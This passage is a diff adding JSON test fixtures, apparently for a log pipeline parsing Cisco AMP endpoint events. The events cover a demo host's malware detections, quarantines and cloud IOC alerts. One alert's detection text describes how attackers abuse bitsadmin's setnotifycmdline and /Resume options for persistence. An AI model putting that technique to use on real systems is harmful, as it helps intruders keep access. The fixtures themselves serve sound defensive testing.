"host": { + "name": "Demo_AMP_Threat_Quarantined", + "hostname": "Demo_AMP_Threat_Quarantined" + }, + "event": { + "severity": 0, + "action": "Policy Update", + "ingested": "2021-09-12T17:32:35.701337792Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533243623469744000,\"timestamp\":1610619329,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T10:15:29+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "id": "6533243623469744000", + "kind": "alert" + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "24:78:d8:fd:c4:75", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "24:78:d8:fd:c4:75" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648130 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "svchost.exe", + "pid": 896, + "hash": { + "sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", + "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", + "md5": 
"54a47f6b5e09a77e61649109c6a08866" + } + }, + "@timestamp": "2021-01-14T10:06:39.000Z", + "file": { + "name": "BIT657.tmp", + "path": "\\\\?\\C:\\BIT657.tmp", + "hash": { + "sha1": "cf162622e29bca072d01b274fbbc3ceaacdd13c7", + "sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "md5": "0fe5be3811a98ee6a9c997d3812d911a" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "0fe5be3811a98ee6a9c997d3812d911a", + "cf162622e29bca072d01b274fbbc3ceaacdd13c7" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Quarantined", + "hostname": "Demo_AMP_Threat_Quarantined", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701339869Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT657.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT657.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533241347137077000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Overdrive.RET", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "24:78:d8:fd:c4:75", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "24:78:d8:fd:c4:75" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": 
"6533241347137077251", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T10:06:39.000Z", + "file": { + "hash": { + "sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Quarantined", + "hostname": "Demo_AMP_Threat_Quarantined" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701341785Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", + "kind": "alert", + "action": "Threat 
Quarantined", + "id": "6533241347137077000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "24:78:d8:fd:c4:75", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "24:78:d8:fd:c4:75" + ] + }, + "detection_id": "6533241347137077251", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "file": { + "hash": { + "sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Quarantined", + "hostname": "Demo_AMP_Threat_Quarantined" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701343742Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6533241145273614000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "24:78:d8:fd:c4:75", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "24:78:d8:fd:c4:75" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6533241145273614337", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "svchost.exe", + "pid": 896, + "hash": { + "sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", + "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", + "md5": "54a47f6b5e09a77e61649109c6a08866" + } + }, + "@timestamp": "2021-01-14T10:05:52.000Z", + "file": { + "name": "SqGGuYXyy.exe", + "path": "\\\\?\\C:\\SqGGuYXyy.exe", + "hash": { + "sha1": "cf162622e29bca072d01b274fbbc3ceaacdd13c7", + "sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "md5": "0fe5be3811a98ee6a9c997d3812d911a" + } + }, + "ecs": { + "version": "1.11.0" + }, + 
"related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "0fe5be3811a98ee6a9c997d3812d911a", + "cf162622e29bca072d01b274fbbc3ceaacdd13c7" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Quarantined", + "hostname": "Demo_AMP_Threat_Quarantined", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701345707Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"SqGGuYXyy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\SqGGuYXyy.exe\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533241145273614000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Overdrive.RET", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "24:78:d8:fd:c4:75", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "24:78:d8:fd:c4:75" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": 
"6533241145273614338", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "svchost.exe", + "pid": 896, + "hash": { + "sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", + "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", + "md5": "54a47f6b5e09a77e61649109c6a08866" + } + }, + "@timestamp": "2021-01-14T10:05:52.000Z", + "file": { + "name": "BIT4BBF.tmp", + "path": "\\\\?\\C:\\BIT4BBF.tmp", + "hash": { + "sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Quarantined", + "hostname": "Demo_AMP_Threat_Quarantined", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701347645Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT4BBF.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT4BBF.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533241145273614000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Overdrive.RET", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "24:78:d8:fd:c4:75", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "24:78:d8:fd:c4:75" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533241145273614337", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + 
}, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "file": { + "hash": { + "sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Quarantined", + "hostname": "Demo_AMP_Threat_Quarantined" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701349558Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6533241145273614000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + 
"computer": { + "active": true, + "network_addresses": [ + { + "mac": "24:78:d8:fd:c4:75", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "24:78:d8:fd:c4:75" + ] + }, + "detection_id": "6533241145273614338", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894" + } + }, + "@timestamp": "2021-01-14T10:05:50.000Z", + "file": { + "name": "WScript.exe", + "path": "/C:/Windows/System32/WScript.exe", + "hash": { + "sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "hash": [ + "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Quarantined", + "hostname": "Demo_AMP_Threat_Quarantined" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701351457Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739875754000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":875739000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud 
IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.\",\"short_description\":\"W32.WScriptExecuteFakeExtension.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", + "kind": "alert", + "start": "2021-01-14T10:05:50.000Z", + "action": "Cloud IOC", + "id": "1521138739875754000", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "24:78:d8:fd:c4:75", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "24:78:d8:fd:c4:75" + ] + }, + "group_guids": [ + 
"test_group_guid" + ], + "cloud_ioc": { + "short_description": "W32.WScriptExecuteFakeExtension.ioc", + "description": "The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it." + }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" + } + }, + "@timestamp": "2021-01-14T10:05:50.000Z", + "file": { + "name": "bitsadmin.exe", + "path": "/C:/Windows/System32/bitsadmin.exe", + "hash": { + "sha256": "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "hash": [ + "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Quarantined", + "hostname": "Demo_AMP_Threat_Quarantined" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701353384Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739868158500,\"timestamp\":1610618750,\"timestamp_nanoseconds\":868146000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud 
IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. 
While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.\",\"short_description\":\"W32.Bitsadmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"bitsadmin.exe\",\"file_path\":\"/C:/Windows/System32/bitsadmin.exe\",\"identity\":{\"sha256\":\"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"}}}}}", + "kind": "alert", + "start": "2021-01-14T10:05:50.000Z", + "action": "Cloud IOC", + "id": "1521138739868158500", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "24:78:d8:fd:c4:75", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "24:78:d8:fd:c4:75" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "cloud_ioc": { + "short_description": "W32.Bitsadmin.ioc", + "description": "Bitsadmin 